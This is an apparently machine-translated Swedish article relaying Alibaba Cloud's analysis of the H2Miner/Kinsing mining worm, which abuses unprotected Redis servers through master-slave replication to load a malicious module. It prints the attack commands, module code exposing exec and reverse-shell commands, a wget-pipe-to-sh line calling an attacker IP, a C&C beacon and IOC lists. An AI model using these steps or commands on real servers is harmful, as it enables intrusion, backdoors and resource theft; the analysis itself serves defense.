För en dag sedan attackerades en av mitt projekts servrar av en liknande mask. På jakt efter ett svar på frågan "vad var det?" Jag hittade en bra artikel av Alibaba Cloud Security-teamet. Eftersom jag inte hittade den här artikeln på Habré bestämde jag mig för att översätta den speciellt för dig <3
Entry
Nyligen upptäckte Alibaba Clouds säkerhetsteam ett plötsligt utbrott av H2Miner. Denna typ av skadlig mask använder avsaknaden av auktorisering eller svaga lösenord för Redis som gateways till dina system, varefter den synkroniserar sin egen skadliga modul med slaven genom master-slave-synkronisering och slutligen laddar ner denna skadliga modul till den attackerade maskinen och kör skadlig instruktioner.
Tidigare utfördes attacker på dina system i första hand med en metod som involverade schemalagda uppgifter eller SSH-nycklar som skrevs till din dator efter att angriparen loggat in på Redis. Lyckligtvis kan denna metod inte användas ofta på grund av problem med behörighetskontroll eller på grund av olika systemversioner. Men den här metoden att ladda en skadlig modul kan direkt utföra angriparens kommandon eller få tillgång till skalet, vilket är farligt för ditt system.
På grund av det stora antalet Redis-servrar som finns på Internet (nästan 1 miljon), rekommenderar Alibaba Clouds säkerhetsteam, som en vänlig påminnelse, att användare inte delar Redis online och regelbundet kontrollerar styrkan på sina lösenord och om de har äventyrats. snabbt urval.
H2Miner
H2Miner är ett gruvbotnät för Linux-baserade system som kan invadera ditt system på en mängd olika sätt, inklusive bristande auktorisering i Hadoop yarn, Docker och Redis remote command execution (RCE) sårbarheter. Ett botnät fungerar genom att ladda ner skadliga skript och skadlig programvara för att bryta dina data, utöka attacken horisontellt och upprätthålla kommando- och kontrollkommunikation (C&C).
Redis RCE
Kunskap om detta ämne delades av Pavel Toporkov på ZeroNights 2018. Efter version 4.0 stöder Redis en plug-in-laddningsfunktion som ger användarna möjlighet att ladda så att filer kompilerade med C till Redis kan utföra specifika Redis-kommandon. Denna funktion, även om den är användbar, innehåller en sårbarhet där, i master-slave-läge, filer kan synkroniseras med slaven via fullresync-läge. Detta kan användas av en angripare för att överföra skadliga filer. Efter att överföringen är klar laddar angriparna modulen till den attackerade Redis-instansen och utför valfritt kommando.
Malware maskanalys
Nyligen upptäckte Alibaba Cloud-säkerhetsteamet att storleken på gruppen H2Miners skadliga gruvarbetare plötsligt har ökat dramatiskt. Enligt analysen är den allmänna processen för attackförekomst som följer:
H2Miner använder RCE Redis för en fullfjädrad attack. Angripare attackerar först oskyddade Redis-servrar eller servrar med svaga lösenord.
Sedan använder de kommandot config set dbfilename red2.so för att ändra filnamnet. Efter detta utför angriparna kommandot slaveof för att ställa in master-slav-replikeringsvärdadressen.
När den attackerade Redis-instansen upprättar en master-slav-anslutning med den skadliga Redis som ägs av angriparen, skickar angriparen den infekterade modulen med fullresync-kommandot för att synkronisera filerna. Red2.so-filen kommer sedan att laddas ner till den attackerade maskinen. Angriparna använder sedan ./red2.so-laddningsmodulen för att ladda denna so-fil. Modulen kan utföra kommandon från en angripare eller initiera en omvänd anslutning (bakdörr) för att få tillgång till den attackerade maskinen.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Efter att ha utfört ett skadligt kommando som t.ex / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, kommer angriparen att återställa säkerhetskopieringsfilens namn och ladda ur systemmodulen för att rensa upp spåren. Red2.so-filen kommer dock fortfarande att finnas kvar på den attackerade maskinen. Användare rekommenderas att vara uppmärksamma på förekomsten av en sådan misstänkt fil i mappen för deras Redis-instans.
Förutom att döda några skadliga processer för att stjäla resurser, följde angriparen ett skadligt skript genom att ladda ner och köra skadliga binära filer till . Detta betyder att processnamnet eller katalognamnet som innehåller kinsing på värden kan indikera att den maskinen har infekterats av detta virus.
Enligt resultaten av reverse engineering utför skadlig programvara huvudsakligen följande funktioner:
- Ladda upp filer och köra dem
- Brytning
- Underhålla C&C-kommunikation och utföra angriparkommandon
Använd masscan för extern skanning för att utöka ditt inflytande. Dessutom är IP-adressen för C&C-servern hårdkodad i programmet, och den attackerade värden kommer att kommunicera med C&C-kommunikationsservern med hjälp av HTTP-förfrågningar, där zombie-informationen (komprometterad server) identifieras i HTTP-huvudet.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Andra attackmetoder
Adresser och länkar som används av masken
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
rådet
För det första bör Redis inte vara tillgänglig från Internet och bör skyddas med ett starkt lösenord. Det är också viktigt att klienter kontrollerar att det inte finns någon red2.so-fil i Redis-katalogen och att det inte finns någon "kinsing" i fil-/processnamnet på värden.
Källa: will.com